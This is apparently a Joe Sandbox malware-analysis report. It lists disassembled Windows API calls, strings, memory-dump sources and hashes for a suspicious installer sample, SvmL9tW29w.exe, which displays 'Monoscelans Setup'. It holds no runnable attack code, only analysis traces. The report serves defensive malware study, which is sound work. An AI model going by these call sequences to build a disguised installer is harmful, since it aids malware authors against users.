                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: Call$N
                                                              • API String ID: 3103080414-3438112850
                                                              • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                              • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                              • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                              • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                              APIs
                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextA.USER32(00000000,Monoscelans Setup,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F$Monoscelans Setup
                                                              • API String ID: 941294808-358882689
                                                              • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                              • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                              • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                              • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                              • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                              • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                              • wsprintfA.USER32 ref: 00405DDB
                                                              • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,?,0042CA20,?,?,?,?,?), ref: 00405E16
                                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E25
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                              • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(?,00402EE1,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00405C94
                                                                • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %s=%s$[Rename]
                                                              • API String ID: 2171350718-1727408572
                                                              • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                              • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                              • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                              • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F2447
                                                                • Part of subcall function 742F1224: lstrcpynA.KERNEL32(00000000,?,742F12CF,-742F404B,742F11AB,-000000A0), ref: 742F1234
                                                              • GlobalAlloc.KERNEL32(?,?), ref: 742F23C2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 742F23D7
                                                              • GlobalAlloc.KERNEL32(?,?), ref: 742F23E8
                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 742F23F6
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F23FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                              • String ID: @H3w
                                                              • API String ID: 3730416702-4275297014
                                                              • Opcode ID: b4e103f74f73ac6e8be8eccdca85cef5b0a46dfc70208d54ba096638d527968a
                                                              • Instruction ID: c56c7ac2215deeffefc6823e0e31dd43bb388c46b42f46f70af605bd57afa47c
                                                              • Opcode Fuzzy Hash: b4e103f74f73ac6e8be8eccdca85cef5b0a46dfc70208d54ba096638d527968a
                                                              • Instruction Fuzzy Hash: AC41A0B2718301EFE3118F658D44B6AF7F8FB81321F94481EE846C6180DB759A64CB72
                                                              APIs
                                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SvmL9tW29w.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 0040642A
                                                              • CharNextA.USER32(?,?,?,00000000,?,?,?,?), ref: 00406437
                                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\SvmL9tW29w.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 0040643C
                                                              • CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 0040644C
                                                              Strings
                                                              • *?|<>/":, xrefs: 0040641A
                                                              • "C:\Users\user\Desktop\SvmL9tW29w.exe", xrefs: 0040640E
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004063D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\SvmL9tW29w.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                              • API String ID: 589700163-2461437880
                                                              • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                              • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                              • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                              • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                              • GetSysColor.USER32(00000000), ref: 0040423D
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                              • SetBkMode.GDI32(?,?), ref: 00404255
                                                              • GetSysColor.USER32(?), ref: 00404268
                                                              • SetBkColor.GDI32(?,?), ref: 00404278
                                                              • DeleteObject.GDI32(?), ref: 00404292
                                                              • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                              • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                              • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                              • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                              APIs
                                                                • Part of subcall function 742F1215: GlobalAlloc.KERNEL32(?,742F1233,?,742F12CF,-742F404B,742F11AB,-000000A0), ref: 742F121D
                                                              • GlobalFree.KERNEL32(?), ref: 742F25DE
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F2618
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: e5ccfdf811171f6adc544fe3b467fdbe29bbc9615207dac0e5874f230ae5e8ec
                                                              • Instruction ID: f37de37db4c4b8d858e81e632864a4b920baf21f6e60b7d7a7664a0090dedcac
                                                              • Opcode Fuzzy Hash: e5ccfdf811171f6adc544fe3b467fdbe29bbc9615207dac0e5874f230ae5e8ec
                                                              • Instruction Fuzzy Hash: A341C472218101EFD70ACF99CC98D6AB7BAEB86750BD4452DF90187210D736AA24DB71
                                                              APIs
                                                              • lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                              • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                              • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                              • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                              • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                              • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                              • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                              APIs
                                                              • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404AE9
                                                              • GetMessagePos.USER32 ref: 00404AF1
                                                              • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                              • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                              • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                              APIs
                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DD5
                                                              • MulDiv.KERNEL32(000D8671,?,000D9C10), ref: 00402E00
                                                              • wsprintfA.USER32 ref: 00402E10
                                                              • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402E0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                              • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                              • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                              • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                              APIs
                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(?,00402EE1,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00405C94
                                                                • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                              • GlobalAlloc.KERNEL32(?,?), ref: 00402833
                                                              • CloseHandle.KERNEL32(?), ref: 004028B9
                                                                • Part of subcall function 00403300: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040284F
                                                              • GlobalFree.KERNEL32(?), ref: 0040288E
                                                              • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                • Part of subcall function 004030D8: GetTickCount.KERNEL32 ref: 0040313F
                                                                • Part of subcall function 004030D8: GetTickCount.KERNEL32 ref: 004031E6
                                                                • Part of subcall function 004030D8: MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 0040320F
                                                                • Part of subcall function 004030D8: wsprintfA.USER32 ref: 0040321F
                                                              • DeleteFileA.KERNEL32(?), ref: 004028CD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 2082585436-0
                                                              • Opcode ID: ad8dc0df5cf50a855a205d385777f2c415c5d95e0d25c1d6b63c74017563a9c3
                                                              • Instruction ID: 6e699285184ff29696b541cf7178f1326e8dd9af71e7d11efd005e265d558ce4
                                                              • Opcode Fuzzy Hash: ad8dc0df5cf50a855a205d385777f2c415c5d95e0d25c1d6b63c74017563a9c3
                                                              • Instruction Fuzzy Hash: FE217A72800128BBDF116FA5CE48DAEBE79EF08364B14423EF554762E0CA3949819F68
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal
                                                              • String ID:
                                                              • API String ID: 2979337801-0
                                                              • Opcode ID: 1d1997e2a58299e276b3d96623fb5f5dfb8334cd5abd4405d95dffea69412cdd
                                                              • Instruction ID: 2ffaba42b04f89d8e3398931fbc785e956f742e59e588382ec70860ab9f80716
                                                              • Opcode Fuzzy Hash: 1d1997e2a58299e276b3d96623fb5f5dfb8334cd5abd4405d95dffea69412cdd
                                                              • Instruction Fuzzy Hash: E8512832F10196AEEB028FF5CD446BDFBB5AB89651FD8025AD402A3508C6365F71C7A1
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                              • GetClientRect.USER32(?,?), ref: 00401DCC
                                                              • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                              • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                              • DeleteObject.GDI32(00000000), ref: 00401E20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
